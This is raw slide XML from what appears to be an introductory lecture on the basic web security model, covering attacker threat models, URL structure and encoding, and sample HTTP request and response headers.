          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="4343400"/>
              <a:ext cx="685800" cy="45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699FF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" name="Right Arrow 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2057400" y="5257800"/>
              <a:ext cx="685800" cy="45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699FF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" name="Right Arrow 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6324600" y="2362200"/>
              <a:ext cx="685800" cy="45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3300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Right Arrow 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6324600" y="3276600"/>
              <a:ext cx="685800" cy="45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3300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15" name="Picture 11" descr="CompaqAlphaServerES4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00600" y="2228850"/>
              <a:ext cx="1155700" cy="142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28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3184525" y="2619376"/>
              <a:ext cx="840761" cy="4939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System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Cloud Callout 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3981450"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -186846"/>
                <a:gd name="adj2" fmla="val 43949"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent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8" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="17" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="4919662" y="3748088"/>
              <a:ext cx="492125" cy="12065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" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4256088" y="4743450"/>
              <a:ext cx="457200" cy="17145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</p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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48000" y="4252913"/>
              <a:ext cx="1436688" cy="143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1752600" y="3064297"/>
            <a:ext cx="8861425" cy="3140652"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8839200" cy="43434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2895600" y="1976438"/>
              <a:ext cx="3276600" cy="3910014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" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2895600" y="3981450"/>
              <a:ext cx="533400" cy="1905000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6699FF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" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5638800" y="1976438"/>
              <a:ext cx="533400" cy="2157412"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC3300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25" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7162800" y="1905000"/>
              <a:ext cx="1703388" cy="2357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8" descr="Alice _8885 by Disney-Grandpa."/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3886200"/>
              <a:ext cx="1600200" cy="236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extBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6927850" y="4286252"/>
              <a:ext cx="2139950" cy="893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/>
                <a:t>Network Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="644250" y="3421264"/>
              <a:ext cx="635116" cy="51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Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Right Arrow 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="4343400"/>
              <a:ext cx="685800" cy="45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699FF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" name="Right Arrow 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2057400" y="5257800"/>
              <a:ext cx="685800" cy="45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699FF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" name="Right Arrow 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6324600" y="2362200"/>
              <a:ext cx="685800" cy="45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3300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" name="Right Arrow 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6324600" y="3276601"/>
              <a:ext cx="685800" cy="45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3300"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr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33" name="Picture 11" descr="CompaqAlphaServerES4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76600" y="2255838"/>
              <a:ext cx="1155700" cy="1420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extBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4954588" y="4743452"/>
              <a:ext cx="848995" cy="51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System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="4432300" y="2967038"/>
              <a:ext cx="488950" cy="303212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" name="Straight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4242594" y="3899694"/>
              <a:ext cx="1028700" cy="1001712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7" name="Cloud Callout 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800600" y="2778125"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -200975"/>
                <a:gd name="adj2" fmla="val 175085"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent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38" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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48000" y="4252913"/>
              <a:ext cx="1436688" cy="143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9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40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166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 Threat Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14510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209800" y="1600200"/>
            <a:ext cx="7772400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can obtain SSL/TLS certificate for attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or: runs attacker’s Facebook app, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive: Wireless eavesdropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active: Evil router, DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker escapes browser isolation mechanisms and run separately under control of OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451012" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="1375920"/>
            <a:ext cx="0" cy="48006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lg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4573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attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14325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Browsers may contain exploitable bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often enable remote code execution by web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google study:     [the ghost in the browser 2007]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found Trojans on 300,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found adware on 18,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even if browsers were bug-free, still lots of vulnerabilities on the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  of the vulnerabilities on previous graph: XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CSRF, …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3247543" y="3790890"/>
            <a:ext cx="413555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 OUR FOCUS IN THIS PART OF COURSE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00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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation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Navigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security User Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames and frame busting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85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30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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13527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133600" y="1752600"/>
            <a:ext cx="7772400" cy="4648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Global identifiers of network-retrievable documents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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/>
              <a:t> http://stanford.edu:81/class?name=cs155#homework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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0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0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0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0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Special characters are encoded as hex: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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = newline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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = space, %2B = +  (special exception)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2209800" y="2855913"/>
            <a:ext cx="6096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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2855913"/>
            <a:ext cx="13716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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267201" y="2855913"/>
            <a:ext cx="246063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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2855913"/>
            <a:ext cx="6096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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2855913"/>
            <a:ext cx="1371600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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553201" y="2855913"/>
            <a:ext cx="1387475" cy="381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AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1627188" y="3535363"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -145833"/>
              <a:gd name="adj4" fmla="val 114065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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="4262439"/>
            <a:ext cx="1143000" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -364361"/>
              <a:gd name="adj4" fmla="val 132361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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3675063" y="4379913"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -413694"/>
              <a:gd name="adj4" fmla="val 98472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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5818188" y="4370388"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -422736"/>
              <a:gd name="adj4" fmla="val -76079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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7839075" y="4533900"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -476426"/>
              <a:gd name="adj4" fmla="val -1487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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305801" y="3810001"/>
            <a:ext cx="1292225" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -194444"/>
              <a:gd name="adj4" fmla="val -54421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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Fragment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37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133600" y="2241550"/>
            <a:ext cx="8305800" cy="2446824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="2392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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /index.html HTTP/1.1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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept: image/gif, image/x-bitmap, image/jpeg, */*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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.example.com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Referer: http://www.google.com?q=dingbats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0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Request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2133600" y="1600201"/>
            <a:ext cx="9969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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Method</a:t>
            </a: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581400" y="1600201"/>
            <a:ext cx="5778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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File</a:t>
            </a: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4724400" y="1600201"/>
            <a:ext cx="16573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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26631" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="1924050"/>
            <a:ext cx="0" cy="280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>
            <a:off x="3886200" y="1924050"/>
            <a:ext cx="0" cy="280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6633" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1924050"/>
            <a:ext cx="0" cy="280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9144000" y="1600201"/>
            <a:ext cx="10858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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r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 flipH="1">
            <a:off x="8915400" y="1976438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3124200" y="5272088"/>
            <a:ext cx="23812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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data – none for GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26637" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2362200" y="4733925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6638" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="4905376"/>
            <a:ext cx="12636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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blank line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26639" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2362200" y="4429125"/>
            <a:ext cx="23622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354768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2119314" y="5709251"/>
            <a:ext cx="6870727" cy="461665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dirty="0"/>
              <a:t>GET :   no side effect           POST :   possible side effect</a:t>
            </a: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18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92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07031"/>
          </a:xfr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/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Computer Security and Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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407032"/>
            <a:ext cx="9144000" cy="5450967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Lecture 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Basic Web Security Model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0" y="1407032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925" y="2871708"/>
            <a:ext cx="8749471" cy="38497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70" y="93605"/>
            <a:ext cx="922488" cy="12198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261" y="89595"/>
            <a:ext cx="862642" cy="122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6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2378075" y="2589213"/>
            <a:ext cx="7086600" cy="2862262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="2509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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.0 200 OK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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Date: Sun, 21 Apr 1996 02:20:42 GMT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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server: Microsoft-Internet-Information-Server/5.0 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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: keep-alive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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: …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b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length: 2543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b="1">
